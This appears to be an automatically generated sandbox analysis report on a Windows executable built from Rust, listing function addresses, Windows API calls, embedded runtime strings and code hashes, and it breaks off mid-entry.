Part of subcall function 00007FF606E9DC30: GetModuleHandleA.KERNEL32(?,?,?,00007FF606EB694A,?,?,?,?,00007FF606E9DE3B), ref: 00007FF606E9DC44

GetProcAddressForCaller.KERNELBASE(?,?,?,?,00007FF606E9DE3B), ref: 00007FF606EB6960

Strings

InitSecurityInterfaceA, xrefs: 00007FF606EB6956
secur32.dll, xrefs: 00007FF606EB6933
security.dll, xrefs: 00007FF606EB693A

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressCallerHandleModuleProc
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 2084706301-3788156360
Opcode ID: 70115b668c02f96ed13603f6ccd272816c4b37f4c3a481f87f753dd44a310f2c
Instruction ID: c416a587da523802d9cffa8aaf2c61cd485d91a61bac034ef44f05165cf31894
Opcode Fuzzy Hash: 70115b668c02f96ed13603f6ccd272816c4b37f4c3a481f87f753dd44a310f2c
Instruction Fuzzy Hash: 7AF04960E1EB0380FE099B15A98537527A1AF64384FA45438C50DC6391FF7EE55AC300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E351F0, Relevance: 6.6, APIs: 3, Strings: 1, Instructions: 560COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E3570E
memmove.VCRUNTIME140 ref: 00007FF606E3577C
memmove.VCRUNTIME140 ref: 00007FF606E35AAA

Strings

BUG: deferred_dirs should be non-empty, xrefs: 00007FF606E35CFB

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: BUG: deferred_dirs should be non-empty
API String ID: 2162964266-1628160652
Opcode ID: b748f8e225aa86a4e59573fb640f739ccd4889bdc277be82171785dcc82be2fa
Instruction ID: cd0d53cf7ef6c89bd3eb7251259c1b99aa00a985eb594f9cbb946c723c7302d7
Opcode Fuzzy Hash: b748f8e225aa86a4e59573fb640f739ccd4889bdc277be82171785dcc82be2fa
Instruction Fuzzy Hash: D7723C62908BC489E7328F28D8497F96360FFA9758F14A311DF8C5A666EF35A2D5C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E2CB60, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E2CBC3
memmove.VCRUNTIME140 ref: 00007FF606E2CCC5
memmove.VCRUNTIME140 ref: 00007FF606E2CD01

Strings

failed to spawn thread, xrefs: 00007FF606E2CDED

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: failed to spawn thread
API String ID: 2162964266-1155329311
Opcode ID: 4f2befd187fb91c5ca4391a4939684a3b7efec5d606b0c15504ee0d1648d9d57
Instruction ID: d5e33482b214242b618ebbf5c4092e63848afd6c7cd51e24ea386a2b8621faa8
Opcode Fuzzy Hash: 4f2befd187fb91c5ca4391a4939684a3b7efec5d606b0c15504ee0d1648d9d57
Instruction Fuzzy Hash: 73814D32508BC589E7619F38DC413ED27A0FB59758F548125EB8C4BBA9DF39D686C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E375E0, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E37638
memmove.VCRUNTIME140 ref: 00007FF606E37662

Strings

BUG: list/path stacks out of sync, xrefs: 00007FF606E377F9

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: BUG: list/path stacks out of sync
API String ID: 2162964266-1945802833
Opcode ID: fa3a7d24899a04d9d6d21157414f7fd62b1322ae62debe44981e704024712e5a
Instruction ID: a8c46282f8ccd4fdc79d90cf7d7e8ee2e807d65de1749774ab05f68ba4c7d746
Opcode Fuzzy Hash: fa3a7d24899a04d9d6d21157414f7fd62b1322ae62debe44981e704024712e5a
Instruction Fuzzy Hash: F1616F62A08BD594EB319F29D8893E873A0FF44769F640231DB5D467E5DF3AE686C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E64DD0, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF606E64E8A
GetLastError.KERNEL32 ref: 00007FF606E64EA8

Strings

/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E64DD0

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs
API String ID: 1452528299-3047668079
Opcode ID: 33d9242316f07ba1e12ea23fc389aafe5151844a3c491ae67cb4dc79cb702b4b
Instruction ID: bf0221bea81c55489f7d0502b35cba249a6b0dff9b9ec48c8a98664e1518779c
Opcode Fuzzy Hash: 33d9242316f07ba1e12ea23fc389aafe5151844a3c491ae67cb4dc79cb702b4b
Instruction Fuzzy Hash: C7311D725187818BE370CB25F4417AAB7A5FB84394F209124EFC947B95DF7EE4858B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E55DA0, Relevance: 3.8, APIs: 3, Instructions: 37COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E55DE6
memmove.VCRUNTIME140 ref: 00007FF606E55E33

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: b48114c5485fea3daa096035fc935ff5a31240b7383f825f91158f5f89242f83
Instruction ID: e0f88038bc5aa5f3a965ca4e8a5941accc385041b9cc46744690dc4036fcb82d
Opcode Fuzzy Hash: b48114c5485fea3daa096035fc935ff5a31240b7383f825f91158f5f89242f83
Instruction Fuzzy Hash: 11017525B0C7D180FAF09B18E4453E95751EBD1784F904431EA8D97689FE7DE286CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E64BD0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF606E64D50

Strings

/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E64BD0

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs
API String ID: 823142352-3047668079
Opcode ID: 6b9a796bd78838632ac86097bb02db83e91362fd05f08ce27e327cc4b9a3c45f
Instruction ID: 5b3a6caec67f3e435a3b35d592cbf1f349f7fe194e46331b24fffc234eb5d94a
Opcode Fuzzy Hash: 6b9a796bd78838632ac86097bb02db83e91362fd05f08ce27e327cc4b9a3c45f
Instruction Fuzzy Hash: F651A262A0C395D7F7718A11920477A2BD0AB153D4F248135EF9D8BBC0DF7EE8A98710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E32500, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E32530

Strings

..src\main.rs, xrefs: 00007FF606E326EE

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID: ..src\main.rs
API String ID: 2162964266-3308455760
Opcode ID: d64b6a5ec56d95d6b67b98f808d9520f3d9127f179a92cb79422c2dd186a80cb
Instruction ID: e9690c04c4f4cc89ea86653c3dd87f0c5db3de51db9dbdfbaf22e6b9970e0c3a
Opcode Fuzzy Hash: d64b6a5ec56d95d6b67b98f808d9520f3d9127f179a92cb79422c2dd186a80cb
Instruction Fuzzy Hash: 92518E62A08BC189EB319F25D8057E82760FB957A8F548135DF8C9BB99EF359289C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E6C8B0, Relevance: 3.1, APIs: 2, Instructions: 96threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF606E6C925
GetLastError.KERNEL32 ref: 00007FF606E6C974

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateErrorLastThread
String ID:
API String ID: 1689873465-0
Opcode ID: 185872bd1397569e0ba70686ab05cc1399de286d4976f2c50d6cedc9008d97fb
Instruction ID: 191700c90e2f8603fc0d950944e832f7a40ce71b1f643c14a6b6daf199e65e0b
Opcode Fuzzy Hash: 185872bd1397569e0ba70686ab05cc1399de286d4976f2c50d6cedc9008d97fb
Instruction Fuzzy Hash: 3331A032709B5185EB10DF12E8007A967A0FB88BE8F648631EF9D477D5DF3AD5828300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E66630, Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOverlappedResult.KERNEL32 ref: 00007FF606E66678

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: OverlappedResult
String ID:
API String ID: 1111585235-0
Opcode ID: 2ee690f4dfe6243de903abfeeb67f6dcddb1d7e1ed277ff90a31d39b50595a63
Instruction ID: b3918fe8df1aa22a37827f5e4a6d874914d6fbcf6ada3ed24182e6eb8f4e21a5
Opcode Fuzzy Hash: 2ee690f4dfe6243de903abfeeb67f6dcddb1d7e1ed277ff90a31d39b50595a63
Instruction Fuzzy Hash: BE218C61B2C34182EE74CB26E41437E6791AB857C4F244536EB8EC7BD4CE2EE5418652

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E55B50, Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF606E55B8A
GetLastError.KERNEL32 ref: 00007FF606E55BA4

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 476752e101edd3406c3cc2c621790e48741ca261bb37a99d04fb585c2f323454
Instruction ID: e1863f62462a23db502779c9db1e3f8a901b5d3d6302c82a6fa652966a314182
Opcode Fuzzy Hash: 476752e101edd3406c3cc2c621790e48741ca261bb37a99d04fb585c2f323454
Instruction Fuzzy Hash: 8E01AC32A1DB8182E7B09F25F54475963919B457A0F308231EBED877D4DF7ED4818700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E23BF0, Relevance: 2.7, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E23CE1
memmove.VCRUNTIME140 ref: 00007FF606E23CF6

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: bafae4d35f05996e1117147acc23660595ee14dd445356c8d25c3720be9d902c
Instruction ID: e2ac2d76f034f63e78f9eed928c025c844266ac92d32d1391e6ae78b8dbe923f
Opcode Fuzzy Hash: bafae4d35f05996e1117147acc23660595ee14dd445356c8d25c3720be9d902c
Instruction Fuzzy Hash: 84D11E22908BC599E7728F39D8463E863B1FF5875CF549211DF881AA69EF35A3D6C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E34700, Relevance: 1.4, APIs: 1, Instructions: 169COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E34939

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: b9f28f1fa236acda18474705535221c88c012e260e2065e62c7430f9e4fcb92b
Instruction ID: c1d8bd8cd69e747cba72977b6d4702c4ed3a36a747870dcec2508398bea25229
Opcode Fuzzy Hash: b9f28f1fa236acda18474705535221c88c012e260e2065e62c7430f9e4fcb92b
Instruction Fuzzy Hash: 33812E32908BC5CAE7218F39E8453E877A0FB59758F149225EF8D46B66EF39E195C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E452A0, Relevance: 1.4, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E45434

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: f558d0a30bc4549f67e7613a47255aa83a6f09a3cd418c499b11b7dadc1f7329
Instruction ID: 665b27fe2f79b724c38d73b87ea3c667ec4474e6efa71ef63707e691de99cf28
Opcode Fuzzy Hash: f558d0a30bc4549f67e7613a47255aa83a6f09a3cd418c499b11b7dadc1f7329
Instruction Fuzzy Hash: 4D510F2194CBC591F6774B2CA0063E6A3B4FFD8369F145220EBD8027A5EF3AD2978700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E65530, Relevance: 1.3, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF606E65651

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 23c73cdd5e825f9d04b52fc7da0df536eae5db19e0f07501304448e65a31730f
Instruction ID: 18f6a2f33f4473196acad68a49b018e665b9f3df022cbfebe681a5c58c858eae
Opcode Fuzzy Hash: 23c73cdd5e825f9d04b52fc7da0df536eae5db19e0f07501304448e65a31730f
Instruction Fuzzy Hash: 1E418A32B18B1285F7209B12A9447ADA7A1BB047E8F644535EFAD56B88DF7EE081C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E3BD80, Relevance: 1.3, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF606E3BE1E

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: 10f5728a14107781c9aad761218c77a0d0c55e2d5e99458049554f6367740b60
Instruction ID: 7c66a82ce27cfbbe238f549cb673598869858d117f5c37ce1992c58b42f07758
Opcode Fuzzy Hash: 10f5728a14107781c9aad761218c77a0d0c55e2d5e99458049554f6367740b60
Instruction Fuzzy Hash: 7731A422A08B5589EB219F66E8413E86770FF587DCF544231EF8D47B9ADF39D1818380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E65310, Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efed6abde131a4c57eddac642d99e26ea54c86addaf1d92a2a54252291a74086
Instruction ID: 0fd7472fc747b2b79e1f8b51cc371127717d5f5e056680691c5552a23de95603
Opcode Fuzzy Hash: efed6abde131a4c57eddac642d99e26ea54c86addaf1d92a2a54252291a74086
Instruction Fuzzy Hash: AA11E1A1F1C35241FE6155129A086B99A516F81FE0E684130EE9D9BFDEEC7FE5424300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E5CA20, Relevance: 1.3, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF606E5CAA6

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 75c7eb79ef317b976a3ed89c4770c8f10f2a5f9b7a3eb3ca5cf18ee260466b9d
Instruction ID: d1c68f9c7d23d91a2c5228f0cf8b358f34c35f37c53ff01d92ea9e0d4eab4574
Opcode Fuzzy Hash: 75c7eb79ef317b976a3ed89c4770c8f10f2a5f9b7a3eb3ca5cf18ee260466b9d
Instruction Fuzzy Hash: 76217C32A08B8189E750CF61D4443EC3B70FB44BACF608239EA5E97B99DF3AD1858340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E653D0, Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF606E36538), ref: 00007FF606E6544B

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 549366f7176a960c83b9765463295c0c77c7c5b416ba744e09f7182a942cb51a
Instruction ID: 43563744a503c3d5e0e549590819ff205b62599a5d403f2ba0d686ab37e2e5d3
Opcode Fuzzy Hash: 549366f7176a960c83b9765463295c0c77c7c5b416ba744e09f7182a942cb51a
Instruction Fuzzy Hash: 3E012932E18B55C9F7109FA4E8403ED33B0BB547ACF608224DFAD66AD8DF7991928340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E65480, Relevance: 1.3, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00007FF606E347C8), ref: 00007FF606E654FB

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 8b8f22fe74c0fcc696564dc3ef01709daafaf0a7e3f695a2dfa7b5d772fd8440
Instruction ID: e1774653ff78723cf509e35334c0e5e0f3355f32117482eaf9f71c8d56f46ea5
Opcode Fuzzy Hash: 8b8f22fe74c0fcc696564dc3ef01709daafaf0a7e3f695a2dfa7b5d772fd8440
Instruction Fuzzy Hash: 2E012932E18B55C9F7109F64E8403ED33B0BB547ACF208225DFAD66AD8DF7991968340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E55BE0, Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF606E55C2E

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7f52182efcce109e01a81f866d3f9056a280bac5d4c5a8a76daf7f97807c0bd8
Instruction ID: df039892edf9e8da8f064f704fc12a23c33755cf3c4d0f698b6eac2359bcfe61
Opcode Fuzzy Hash: 7f52182efcce109e01a81f866d3f9056a280bac5d4c5a8a76daf7f97807c0bd8
Instruction Fuzzy Hash: 73F06232618B5186E7309B65F440756B2909788794F208630EAED877D4DF7DD1428B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF606E63B40, Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 348COMMON

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 00007FF606E63FE0
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF606E63F9F
Box<Any><unnamed>, xrefs: 00007FF606E63B43
kernel32SetThreadStackGuaranteeSetThreadDescriptioncondition variables not availablelibrary\std\src\sys\windows\c.rs, xrefs: 00007FF606E63B69
/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs, xrefs: 00007FF606E63B47, 00007FF606E63FDC

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674460187.00007FF606EC2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674489561.00007FF606EEF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674497646.00007FF606EF0000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\core\src\str\pattern.rs$AcquireSRWLockExclusive$Box<Any><unnamed>$called `Result::unwrap()` on an `Err` value$kernel32SetThreadStackGuaranteeSetThreadDescriptioncondition variables not availablelibrary\std\src\sys\windows\c.rs
API String ID: 0-1497540586
Opcode ID: c127a5cc7069893c585799c692872ef029cb252ccd213e56f9f0da9a1bc7e667
Instruction ID: f17debafae95963fb8a153f8dfdac4f216ca9016cebc9f1693772c1b7e26abff
Opcode Fuzzy Hash: c127a5cc7069893c585799c692872ef029cb252ccd213e56f9f0da9a1bc7e667
Instruction Fuzzy Hash: 81C12462F1CBA144F7548B2598043BD2BA1BB447D8F245631FF1E87BC9DE3AD9818350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF606E65960, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 226windowCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF606E659A6
GetModuleHandleW.KERNEL32 ref: 00007FF606E659BF
FormatMessageW.KERNEL32 ref: 00007FF606E65A05
GetLastError.KERNEL32 ref: 00007FF606E65BA5

Strings

assertion failed: self.is_char_boundary(new_len)/rustc/e1884a8e3c3e813aada8254edfa120e85bf5ffca\library\alloc\src\string.rs, xrefs: 00007FF606E65B8B
NTDLL.DLL, xrefs: 00007FF606E659B8

Memory Dump Source

Source File: 00000000.00000002.674350421.00007FF606E11000.00000020.00020000.sdmp, Offset: 00007FF606E10000, based on PE: true

Associated: 00000000.00000002.674338488.00007FF606E10000.00000002.00020000.sdmp Download File
